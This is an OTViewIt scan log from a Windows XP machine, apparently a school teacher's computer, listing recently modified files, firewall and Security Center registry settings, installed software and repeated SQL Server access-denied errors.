[2009/04/02 13:43:58 | 00,002,206 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2009/04/02 13:42:56 | 00,000,402 | ---- | M] () -- C:\WINDOWS\tasks\gpupdate.job
[2009/04/02 13:42:46 | 00,000,006 | -H-- | M] () -- C:\WINDOWS\tasks\SA.DAT
[2009/04/02 13:42:29 | 00,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2009/04/02 13:41:18 | 03,776,976 | -H-- | M] () -- C:\Documents and Settings\dreger\Local Settings\Application Data\IconCache.db
[2009/04/02 13:34:08 | 00,401,720 | ---- | M] (Trend Micro Inc.) -- C:\HiJackThis.exe
[2009/04/02 13:33:26 | 00,422,912 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\dreger\Desktop\powerpnt.exe.exe
[2009/04/01 14:11:21 | 00,002,626 | ---- | M] () -- C:\WINDOWS\System32\CONFIG.NT
[2009/04/01 13:45:26 | 00,001,724 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\avast! Antivirus.lnk
[2009/04/01 13:44:27 | 00,612,740 | ---- | M] () -- C:\cc_20090401_134419.reg
[2009/03/31 09:52:47 | 00,000,072 | ---- | M] () -- C:\WINDOWS\bi_group.ini
[2009/03/30 11:05:16 | 00,000,227 | ---- | M] () -- C:\WINDOWS\system.ini
[2009/03/30 11:05:16 | 00,000,211 | -HS- | M] () -- C:\boot.ini
[2009/03/30 11:05:16 | 00,000,000 | ---- | M] () -- C:\WINDOWS\win.ini
[2009/03/27 23:22:03 | 00,000,284 | ---- | M] () -- C:\WINDOWS\tasks\AppleSoftwareUpdate.job
[2009/03/27 08:58:05 | 00,071,328 | ---- | M] () -- C:\Documents and Settings\dreger\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
[2009/03/27 08:57:50 | 00,000,077 | -HS- | M] () -- C:\Documents and Settings\dreger\My Documents\desktop.ini
[2009/03/20 22:07:21 | 00,491,236 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
[2009/03/20 22:07:21 | 00,089,674 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
[2009/03/20 22:07:20 | 00,527,328 | ---- | M] () -- C:\WINDOWS\System32\PerfStringBackup.INI
[2009/03/17 13:16:59 | 00,278,152 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2009/03/10 22:18:20 | 01,482,112 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\LegitCheckControl.dll
[2009/03/10 22:18:14 | 00,934,792 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\WgaTray.exe
[2009/03/10 22:18:14 | 00,934,792 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\WgaTray.exe
[2009/03/10 22:18:00 | 00,239,496 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\WgaLogon.dll
[2009/03/10 22:18:00 | 00,239,496 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\wgaLogon.dll
[2009/02/26 07:22:09 | 00,038,528 | ---- | M] (Sophos Plc) -- C:\WINDOWS\System32\drivers\savonaccessfilter.sys
[2009/02/26 06:23:02 | 00,110,848 | ---- | M] (Sophos Plc) -- C:\WINDOWS\System32\drivers\savonaccesscontrol.sys
[2009/02/25 12:55:00 | 24,768,960 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\MRT.exe
[2009/02/09 06:13:27 | 01,846,784 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\win32k.sys
[2009/02/09 06:13:27 | 01,846,784 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\win32k.sys
[2009/02/05 15:11:35 | 01,256,296 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\aswBoot.exe
[2009/02/05 15:08:19 | 00,093,296 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswmon.sys
[2009/02/05 15:08:10 | 00,094,032 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswmon2.sys
[2009/02/05 15:07:23 | 00,114,768 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswSP.sys
[2009/02/05 15:07:12 | 00,020,560 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswFsBlk.sys
[2009/02/05 15:06:20 | 00,051,376 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswTdi.sys
[2009/02/05 15:06:10 | 00,023,152 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswRdr.sys
[2009/02/05 15:05:11 | 00,026,944 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aavmker4.sys
[2009/02/05 15:04:45 | 00,097,480 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\AvastSS.scr

========== Custom Scans ==========

< End of report >

Extras
OTViewIt Extras logfile created on: 4/2/2009 1:47:47 PM - Run 2
OTViewIt by OldTimer - Version 1.0.21.0 Folder = C:\Documents and Settings\dreger\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 7.0.5730.13)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

1021.98 Mb Total Physical Memory | 493.18 Mb Available Physical Memory | 48.26% Memory free
2.41 Gb Paging File | 1.93 Gb Available in Paging File | 80.22% Paging File free
Paging file location(s): C:\pagefile.sys 1536 3072;

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 37.24 Gb Total Space | 6.29 Gb Free Space | 16.89% Space Free | Partition Type: NTFS
D: Drive not present or media not loaded
Drive E: | 1.86 Gb Total Space | 0.16 Gb Free Space | 8.32% Space Free | Partition Type: FAT
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
I: Drive not present or media not loaded

Computer Name: 001_23_TEACHER
Current User Name: dreger
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: All users
Whitelist: On
File Age = 60 Days

========== File Associations ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]

========== Security Center Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"FirstRunDisabled"=1
"AntiVirusDisableNotify"=0
"FirewallDisableNotify"=0
"UpdatesDisableNotify"=0
"AntiVirusOverride"=0
"FirewallOverride"=1
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]
"DisableMonitoring"=1
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
"EnableFirewall"=0
"DoNotAllowExceptions"=0
"DisableNotifications"=0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts]

========== Authorized Applications List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
[2008/04/14 05:42:36 | 00,141,312 | ---- | M] (Microsoft Corporation) -- %windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019
[2008/04/14 00:23:34 | 00,558,080 | ---- | M] (Microsoft Corporation) -- %windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000
[2005/08/10 16:58:18 | 00,491,520 | ---- | M] () -- C:\WINDOWS\system32\DKabcoms.exe:*:Enabled:Dell Enhanced TCP/IP
[2004/02/13 14:12:08 | 00,016,423 | ---- | M] () -- C:\Program Files\Kodak\KODAK Software Updater\7288971\Program\Kodak Software Updater.exe:*:Enabled:Kodak Software Updater
[2005/07/22 03:47:22 | 00,151,552 | ---- | M] () -- C:\Program Files\Kodak\Kodak EasyShare software\bin\EasyShare.exe:*:Enabled:EasyShare

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
[2008/04/14 05:42:36 | 00,141,312 | ---- | M] (Microsoft Corporation) -- %windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019
[2008/04/14 00:23:34 | 00,558,080 | ---- | M] (Microsoft Corporation) -- %windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000
[2007/07/24 15:17:08 | 00,229,376 | ---- | M] (Apple Inc.) -- C:\Program Files\Bonjour\mDNSResponder.exe:*:Enabled:Bonjour
[2008/03/30 10:36:34 | 20,638,504 | ---- | M] (Apple Inc.) -- C:\Program Files\iTunes\iTunes.exe:*:Enabled:iTunes
[2008/05/21 04:37:24 | 12,844,576 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE:*:Enabled:Microsoft Office Outlook
[2005/08/10 16:58:18 | 00,491,520 | ---- | M] () -- C:\WINDOWS\system32\DKabcoms.exe:*:Enabled:Dell Enhanced TCP/IP
[2005/07/22 03:47:22 | 00,151,552 | ---- | M] () -- C:\Program Files\Kodak\Kodak EasyShare software\bin\EasyShare.exe:*:Enabled:EasyShare

========== (O10) Winsock2 Catalogs ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\]
NameSpace_Catalog5\Catalog_Entries\000000000004 [mdnsNSP] -- C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)

========== (O18) Protocol Handlers ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
ipp: [HKLM - No CLSID value]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\] - Protocol Handlers
[2007/08/28 23:55:14 | 01,014,128 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL ipp\0x00000001:{E1D2BF42-A96B-11d1-9C6B-0000F875AC61} (HKLM) [HKLM - MSDAMON.BINDER]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
msdaipp: [HKLM - No CLSID value]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\] - Protocol Handlers
[2007/08/28 23:55:14 | 01,014,128 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL msdaipp\0x00000001:{E1D2BF42-A96B-11d1-9C6B-0000F875AC61} (HKLM) [HKLM - MSDAMON.BINDER]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\] - Protocol Handlers
[2007/08/28 23:55:14 | 01,014,128 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL msdaipp\oledb:{E1D2BF40-A96B-11d1-9C6B-0000F875AC61} (HKLM) [HKLM - MSDAIPP.BINDER]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
[2006/10/26 13:45:02 | 00,873,216 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Help\hxds.dll (ms-help:{314111c7-a502-11d2-bbca-00c04f8ec294} (HKLM) [HxProtocol Class])

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
[2007/05/10 13:45:34 | 08,069,464 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Web Components\11\OWC11.DLL (mso-offdap11:{32505114-5902-49B2-880A-1F7738E5A384} (HKLM) [Data Page Plugable Protocal mso-offdap11 Handler])

========== (O18) Protocol Filters ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\] - Protocol Filters
[2006/10/26 21:41:48 | 00,044,344 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OFFICE12\MSOXMLMF.DLL text/xml:{807563E5-5146-11D5-A672-00B0D022E945} (HKLM) [Microsoft Office InfoPath XML Mime Filter]

========== HKEY_LOCAL_MACHINE Uninstall List ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0008546E-DF6E-4CC1-AFD0-2CB8E16C95A2}"=Notifier
"{02DFF6B1-1654-411C-8D7B-FD6052EF016F}"=Apple Software Update
"{034759DA-E21A-4795-BFB3-C66D17FAD183}"=Sophos Anti-Virus
"{08786A53-D98F-484A-867C-3302BC5AE30D}"=Digital Blue QX5 Microscope
"{08CA9554-B5FE-4313-938F-D4A417B81175}"=QuickTime
"{0D25F7CC-B99C-44ee-9945-B14532B2BB7B}"=Canon MP830
"{14D4ED84-6A9A-45A0-96F6-1753768C3CB5}"=ESSPCD
"{154508C0-07C5-4659-A7A0-E49968750D21}"=HLPPDOCK
"{15C418EB-7675-42be-B2B3-281952DA014D}"=Sophos AutoUpdate
"{2318C2B1-4965-11d4-9B18-009027A5CD4F}"=Google Toolbar for Internet Explorer
"{2348B97D-C991-438F-BC44-294C931E7B8B}"=SMART Essentials for Educators
"{26A24AE4-039D-4CA4-87B4-2F83216011FF}"=Java™ 6 Update 11
"{2AFFFDD7-ED85-4A90-8C52-5DA9EBDC9B8F}"=Microsoft SQL Server 2005 Express Edition (MSSMLBIZ)
"{2BA00471-0328-3743-93BD-FA813353A783}"=Microsoft .NET Framework 3.0 Service Pack 1
"{3248F0A8-6813-11D6-A77B-00B0D0160050}"=Java™ 6 Update 5
"{3248F0A8-6813-11D6-A77B-00B0D0160070}"=Java™ 6 Update 7
"{34C7E079-2B62-478F-88B2-E3EDACDE5078}"=AVerVision Software
"{350C97B0-3D7C-4EE8-BAA9-00BCB3D54227}"=WebFldrs XP
"{353D20CC-719B-4A60-AD33-D03F88C10330}"=Microsoft Office Accounting PayPal Addin
"{38441BE7-79B0-42B8-8297-833704F949FE}"=HLPIndex
"{3B1EEBD2-1C3E-488D-BAB9-AA2EB55F623A}"=South-Western Peachtree Accounting Problems
"{3CA39B0C-BA85-4D42-AC0F-1FF5F60C3353}"=OTtBPSDK
"{432C3720-37BF-4BD7-8E49-F38E090246D0}"=CR2
"{44734179-8A79-4DEE-BB08-73037F065543}"=Apple Mobile Device Support
"{46486451-E60F-42C3-92D7-796D8594688A}"=SMART Board Software
"{46614A49-222A-48EF-87A9-BFD603E608E1}"=Microsoft Office Accounting Fixed Asset Manager
"{47BF1BD6-DCAC-468F-A0AD-E5DECC2211C3}"=Bonjour
"{48C82F7A-F100-4DAB-A310-8E18BF2159E1}"=ESSvpot
"{4F677FC7-7AA8-412B-A957-F13CBE1C7331}"=ESSSONIC
"{50120000-1105-0000-0000-0000000FF1CE}"=Microsoft Office 2007 Primary Interop Assemblies
"{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}"=Microsoft SQL Server Setup Support Files (English)
"{54C8FE84-89C4-40E8-976C-439EB0729BD6}"=CardRd81
"{56B4002F-671C-49F4-984C-C760FE3806B5}"=Microsoft SQL Server VSS Writer
"{585776BC-4BD6-4BD2-A19A-1D6CB44A403B}"=iTunes
"{5EE30018-CB99-464D-903D-F794592F503B}"=Lightspeed Systems User Agent v2.00.00
"{5FA793A6-0071-42C1-9355-8F69A428C44F}"=Microsoft Office Accounting ADP Payroll Addin
"{605A4E39-613C-4A12-B56F-DEFBE6757237}"=SHASTA
"{643EAE81-920C-4931-9F0B-4B343B225CA6}"=ESSBrwr
"{79D5997E-BF79-48BB-8B41-9BE59C15C2D7}"=OmniPage SE 2.0
"{87843A41-7808-4F2E-B13F-25C1E67CF2FD}"=ESShelp
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}"=Microsoft Silverlight
"{8A502E38-29C9-49FA-BCFA-D727CA062589}"=ESSTOOLS
"{8A708DD8-A5E6-11D4-A706-000629E95E20}"=Intel® Extreme Graphics 2 Driver
"{8BB4B58A-A402-4DE8-8FCD-287E60B88DD8}"=ESSCT
"{8C711818-076E-475C-B95B-DF11CD9D8DBE}"=Microsoft Office Accounting Equifax Addin
"{8DD94CA3-BCD2-49C0-B537-F3B5D95FF0C8}"=HLPSFO
"{8E92D746-CD9F-4B90-9668-42B74C14F765}"=ESSini
"{90120000-0010-0409-0000-0000000FF1CE}"=Microsoft Software Update for Web Folders (English) 12
"{90120000-0015-0409-0000-0000000FF1CE}"=Microsoft Office Access MUI (English) 2007
"{90120000-0015-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0016-0409-0000-0000000FF1CE}"=Microsoft Office Excel MUI (English) 2007
"{90120000-0016-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0018-0409-0000-0000000FF1CE}"=Microsoft Office PowerPoint MUI (English) 2007
"{90120000-0018-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0019-0409-0000-0000000FF1CE}"=Microsoft Office Publisher MUI (English) 2007
"{90120000-0019-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001A-0409-0000-0000000FF1CE}"=Microsoft Office Outlook MUI (English) 2007
"{90120000-001A-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001B-0409-0000-0000000FF1CE}"=Microsoft Office Word MUI (English) 2007
"{90120000-001B-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001F-0409-0000-0000000FF1CE}"=Microsoft Office Proof (English) 2007
"{90120000-001F-0409-0000-0000000FF1CE}_PROHYBRIDR_{3EC77D26-799B-4CD8-914F-C1565E796173}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001F-040C-0000-0000000FF1CE}"=Microsoft Office Proof (French) 2007
"{90120000-001F-040C-0000-0000000FF1CE}_PROHYBRIDR_{430971B1-C31E-45DA-81E0-72C095BAB72C}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001F-0C0A-0000-0000000FF1CE}"=Microsoft Office Proof (Spanish) 2007
"{90120000-001F-0C0A-0000-0000000FF1CE}_PROHYBRIDR_{F7A31780-33C4-4E39-951A-5EC9B91D7BF1}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-002C-0409-0000-0000000FF1CE}"=Microsoft Office Proofing (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}"=Microsoft Office Shared MUI (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}_PROHYBRIDR_{FAD8A83E-9BAC-4179-9268-A35948034D85}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0115-0409-0000-0000000FF1CE}"=Microsoft Office Shared Setup Metadata MUI (English) 2007
"{90120000-0115-0409-0000-0000000FF1CE}_PROHYBRIDR_{FAD8A83E-9BAC-4179-9268-A35948034D85}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0117-0409-0000-0000000FF1CE}"=Microsoft Office Access Setup Metadata MUI (English) 2007
"{90120000-0117-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90A40409-6000-11D3-8CFE-0150048383C9}"=Microsoft Office 2003 Web Components
"{91120000-0031-0000-0000-0000000FF1CE}"=Microsoft Office Professional Hybrid 2007
"{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{BEE75E01-DD3F-4D5F-B96C-609E6538D419}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{91517631-A9F3-4B7C-B482-43E0068FD55A}"=ESSgui
"{999D43F4-9709-4887-9B1A-83EBB15A8370}"=VPRINTOL
"{9D8FEE90-0377-49A9-AEFB-525BDE549BA4}"=ESScore
"{A06275F4-324B-4E85-95E6-87B2CD729401}"=Windows Defender
"{A5B3EB8A-4071-42F0-8E8E-7A8342AA8E69}"=ESSvpaht
"{A939D341-5A04-4E0A-BB55-3E65B386432D}"=Microsoft Office Small Business Connectivity Components
"{AC76BA86-7AD7-1033-7B44-A81200000003}"=Adobe Reader 8.1.2
"{AE1FA02D-E6A4-4EA0-8E58-6483CAC016DD}"=ESSCDBK
"{B0717D5A-1976-482B-9ADF-F19631A541A4}"=Microsoft Office Accounting 2007
"{B162D0A6-9A1D-4B7C-91A5-88FB48113C45}"=OfotoXMI
"{B32C4059-6E7A-41EF-AD20-56DF1872B923}"=Business Contact Manager for Outlook 2007 SP1
"{B4B44FE7-41FF-4DAD-8C0A-E406DDA72992}"=CCScore
"{B508B3F1-A24A-32C0-B310-85786919EF28}"=Microsoft .NET Framework 2.0 Service Pack 1
"{B997C2A0-4383-41BF-B76E-9B8B7ECFB267}"=KSU
"{BAF78226-3200-4DB4-BE33-4D922A799840}"=Windows Presentation Foundation
"{BD68F46D-8A82-4664-8E68-F87C55BDEFD4}"=Microsoft SQL Server Native Client
"{C7C162CF-0188-4579-8FBD-683658A9DF57}"=South-Western Peachtree Accounting Solutions
"{CA60320D-6A16-49C8-A34F-84EEF4799567}"=ESSTUTOR
"{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}"=Microsoft .NET Framework 1.1
"{CF40ACC5-E1BB-4aff-AC72-04C2F616BCA7}"=getPlus® for Adobe
"{D32470A1-B10C-4059-BA53-CF0486F68EBC}"=Kodak EasyShare software
"{D78653C3-A8FF-415F-92E6-D774E634FF2D}"=Dell ResourceCD
"{DB02F716-6275-42E9-B8D2-83BA2BF5100B}"=SFR
"{DBEA1034-5882-4A88-8033-81C4EF0CFA29}"=Google Toolbar for Internet Explorer
"{EA52A1AC-D35D-4D25-8686-9466FE2C5CE5}"=Presto! PageManager 7.15.11
"{F0A37341-D692-11D4-A984-009027EC0A9C}"=SoundMAX
"{F4A2E7CC-60CA-4AFA-B67F-AD5E58173C3F}"=SKINXSDK
"{F71760CD-0F8B-4DCC-B7B7-6B223CC3843C}"=OTtBP
"{F9593CFB-D836-49BC-BFF1-0E669A411D9F}"=WIRELESS
"{FCDB1C92-03C6-4C76-8625-371224256091}"=ESSPDock
"{FDF9943A-3D5C-46B3-9679-586BD237DDEE}"=SKIN0001
"{FEDE2483-87B7-44C1-A5BB-D75AEB8B6340}"=ESSEMAIL
"{FF11005D-CBC8-45D5-A288-25C7BB304121}"=Sophos Remote Management System
"{FF9278B4-1A52-4E18-A668-E9F2219F5798}"=Classroom Performance System
"9C7E96126D886BC04FAA6ABAD9312271DB76E1F1"=Windows Driver Package - Digital Blue (marsqx5) Image (04/04/2007 1.0.0.0)
"Adobe Acrobat 4.0"=Adobe Acrobat 4.0
"Adobe Flash Player ActiveX"=Adobe Flash Player 10 ActiveX
"Adobe Shockwave Player"=Adobe Shockwave Player 11
"Applied MicroType 3.0"=Applied MicroType 3.0
"avast!"=avast! Antivirus
"Business Contact Manager"=Business Contact Manager for Outlook 2007 SP1
"CCleaner"=CCleaner (remove only)
"CrswWzrd2.0"=Crossword Wizard 2.0
"Dell_HostCD"=Dell Software Uninstall
"Easy-PhotoPrint"=Canon Utilities Easy-PhotoPrint
"Easy-WebPrint"=Easy-WebPrint
"ePatLauncher"=ePatLauncher
"IDNMitigationAPIs"=Microsoft Internationalized Domain Names Mitigation APIs
"ie7"=Windows Internet Explorer 7
"InstallShield_{34C7E079-2B62-478F-88B2-E3EDACDE5078}"=AVerVision Software
"Lotus Notes"=Lotus Notes
"Microsoft .NET Framework 1.1 (1033)"=Microsoft .NET Framework 1.1
"Microsoft Office Accounting 2007"=Microsoft Office Accounting 2007
"Microsoft Office Accounting Equifax Addin"=Microsoft Office Accounting Equifax Addin
"Microsoft Office Accounting PayPal Addin"=Microsoft Office Accounting PayPal Addin
"Microsoft SQL Server 2005"=Microsoft SQL Server 2005
"MP Navigator 2.2"=Canon MP Navigator 2.2
"MSCompPackV1"=Microsoft Compression Client Pack 1.0 for Windows XP
"NLSDownlevelMapping"=Microsoft National Language Support Downlevel APIs
"Peachtree Complete Accounting"=Peachtree Complete Accounting 2003
"PROHYBRIDR"=2007 Microsoft Office system
"PROSet"=Intel® PRO Network Connections Drivers
"WIC"=Windows Imaging Component
"Windows Media Format Runtime"=Windows Media Format 11 runtime
"Windows Media Player"=Windows Media Player 11
"Windows XP Service Pack"=Windows XP Service Pack 3
"WMFDist11"=Windows Media Format 11 runtime
"wmp11"=Windows Media Player 11
"Wudf01000"=Microsoft User-Mode Driver Framework Feature Pack 1.0
"XpsEPSC"=XML Paper Specification Shared Components Pack 1.0
"Yahoo! Companion"=Yahoo! Toolbar

========== Last 10 Event Log Errors ==========

[ Application Events ]
Error - 4/1/2009 5:21:09 PM | Computer Name = 001_23_TEACHER | Source = MSSQL$MSSMLBIZ | ID = 17207
Description = FCB::Open: Operating system error 5(Access is denied.) occurred while
creating or opening file 'c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\mastlog.ldf'.
Diagnose and correct the operating system error, and retry the operation.

Error - 4/1/2009 5:21:09 PM | Computer Name = 001_23_TEACHER | Source = MSSQL$MSSMLBIZ | ID = 17204
Description = FCB::Open failed: Could not open file c:\Program Files\Microsoft SQL
Server\MSSQL.1\MSSQL\DATA\mastlog.ldf for file number 2. OS error: 5(Access is
denied.).

Error - 4/1/2009 6:00:05 PM | Computer Name = 001_23_TEACHER | Source = MSSQL$MSSMLBIZ | ID = 17207
Description = FCB::Open: Operating system error 5(Access is denied.) occurred while
creating or opening file 'c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\master.mdf'.
Diagnose and correct the operating system error, and retry the operation.

Error - 4/1/2009 6:00:05 PM | Computer Name = 001_23_TEACHER | Source = MSSQL$MSSMLBIZ | ID = 17204
Description = FCB::Open failed: Could not open file c:\Program Files\Microsoft SQL
Server\MSSQL.1\MSSQL\DATA\master.mdf for file number 1. OS error: 5(Access is
denied.).

Error - 4/1/2009 6:00:05 PM | Computer Name = 001_23_TEACHER | Source = MSSQL$MSSMLBIZ | ID = 17207
Description = FCB::Open: Operating system error 5(Access is denied.) occurred while
creating or opening file 'c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\mastlog.ldf'.
Diagnose and correct the operating system error, and retry the operation.

Error - 4/1/2009 6:00:05 PM | Computer Name = 001_23_TEACHER | Source = MSSQL$MSSMLBIZ | ID = 17204
Description = FCB::Open failed: Could not open file c:\Program Files\Microsoft SQL
Server\MSSQL.1\MSSQL\DATA\mastlog.ldf for file number 2. OS error: 5(Access is
denied.).

Error - 4/2/2009 2:44:39 PM | Computer Name = 001_23_TEACHER | Source = MSSQL$MSSMLBIZ | ID = 17207
Description = FCB::Open: Operating system error 5(Access is denied.) occurred while
creating or opening file 'c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\master.mdf'.
Diagnose and correct the operating system error, and retry the operation.

Error - 4/2/2009 2:44:39 PM | Computer Name = 001_23_TEACHER | Source = MSSQL$MSSMLBIZ | ID = 17204
Description = FCB::Open failed: Could not open file c:\Program Files\Microsoft SQL
Server\MSSQL.1\MSSQL\DATA\master.mdf for file number 1. OS error: 5(Access is
denied.).

Error - 4/2/2009 2:44:41 PM | Computer Name = 001_23_TEACHER | Source = MSSQL$MSSMLBIZ | ID = 17207
Description = FCB::Open: Operating system error 5(Access is denied.) occurred while
creating or opening file 'c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\mastlog.ldf'.
Diagnose and correct the operating system error, and retry the operation.

